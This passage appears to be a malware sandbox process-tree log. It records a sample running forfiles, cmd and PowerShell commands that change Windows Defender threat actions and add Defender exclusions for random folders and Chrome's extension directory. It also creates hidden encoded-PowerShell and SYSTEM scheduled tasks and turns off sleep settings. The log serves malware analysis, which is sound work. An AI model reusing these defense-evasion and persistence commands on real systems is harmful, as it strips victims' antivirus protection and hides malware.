    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:4672
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:4880
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:4876
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:1080
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:2992
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:220
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:320
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:1384
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:4400
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:4624
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:3344
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:4680
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:4020
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:4708
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3748
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5040
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:568
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3524
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4540
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3192
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1080
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4060
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2120
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1888
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5068
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4524
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2860
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3840
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1164
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:352
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3540
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1040
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:904
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1872
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:316
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2216
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2924
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3524
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5084
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3896
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hkBthRLftwjEC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hkBthRLftwjEC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oGdIbQIKIHUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oGdIbQIKIHUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\prAQyJMeU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\prAQyJMeU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zNBDoCPwUgCU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zNBDoCPwUgCU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wpmocubwzvTKZWVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wpmocubwzvTKZWVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HKomOEKiubDeyUja\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HKomOEKiubDeyUja\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:308
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2816
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:4384
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3888
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hkBthRLftwjEC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4324
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hkBthRLftwjEC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2200
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oGdIbQIKIHUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4680
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oGdIbQIKIHUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1928
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prAQyJMeU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3148
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prAQyJMeU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5116
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zNBDoCPwUgCU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:232
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zNBDoCPwUgCU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3700
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wpmocubwzvTKZWVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2928
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wpmocubwzvTKZWVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2924
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3524
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5084
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3408
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HKomOEKiubDeyUja /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4292
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HKomOEKiubDeyUja /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4876
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gJrqVsjoL" /SC once /ST 02:03:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:4336
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4360
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gJrqVsjoL"
  2⤵
  PID:2828
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gJrqVsjoL"
  2⤵
  PID:932
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "emrEEeoVdUigmulhl" /SC once /ST 01:41:37 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\dLttyhs.exe\" 4u /IahIdidcc 525403 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:1048
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "emrEEeoVdUigmulhl"
  2⤵
  PID:4336
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2508 -s 896
  2⤵
  - Program crash
  PID:196

C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe
C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe
1⤵
PID:320
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:4932
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:3536
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:3148
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:1600
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:4388
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:4288

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:3692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:604
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:4172

C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\dLttyhs.exe
C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\dLttyhs.exe 4u /IahIdidcc 525403 /S
1⤵
PID:1372
- C:\Windows\SysWOW64\cmd.exe
